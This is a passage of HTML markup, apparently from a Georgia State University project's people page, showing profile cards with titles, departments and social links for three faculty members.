11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c22-outer\">\n            <div data-colibri-id=\"182-c22\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c22 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c23\" class=\"d-block style-982 style-local-182-c23 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-SRM-360x360-1.png\" class=\"wp-image-1601 style-982-image style-local-182-c23-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-982-frameImage style-local-182-c23-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c24\" class=\"h-global-transition-all h-heading style-974 style-local-182-c24 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c24\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Susie Ramisetty-Mikler</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c25\" class=\"h-text h-text-component style-975 style-local-182-c25 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Research Associate Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c26\" class=\"h-text h-text-component style-976 style-local-182-c26 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Population Health Sciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c27\" class=\"style-983 style-local-182-c27 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/susie-ramisetty-mikler-7a0b3014/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://publichealth.gsu.edu/profile/susie-ramisetty-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=KzNVJwIAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c40-outer\">\n            <div data-colibri-id=\"182-c40\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c40 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c41\" class=\"d-block style-973 style-local-182-c41 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-zelikovsky.jpeg\" class=\"wp-image-704 style-973-image style-local-182-c41-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c41-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c42\" class=\"h-global-transition-all h-heading style-974 style-local-182-c42 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c42\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Alex Zelikovsky</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c43\" class=\"h-text h-text-component style-975 style-local-182-c43 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Distinguished University Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c44\" class=\"h-text h-text-component style-976 style-local-182-c44 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c45\" class=\"style-977 style-local-182-c45 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/alex-zelikovsky-48a2795/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/alex-zelikovsky/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=UzCRNJwAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c28-outer\">\n            <div data-colibri-id=\"182-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c28 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c29\" class=\"d-block style-973 style-local-182-c29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-bourgeois.jpeg\" class=\"wp-image-696 style-973-image style-local-182-c29-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c29-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c30\" class=\"h-global-transition-all h-heading style-974 style-local-182-c30 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c30\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anu Bourgeois</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c31\" class=\"h-text h-text-component style-975 style-local-182-c31 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c32\" class=\"h-text h-text-component style-976 style-local-182-c32 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c33\" class=\"style-977 style-local-182-c33 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anu-bourgeois-09b7b32b/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/anu-bourgeois/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" 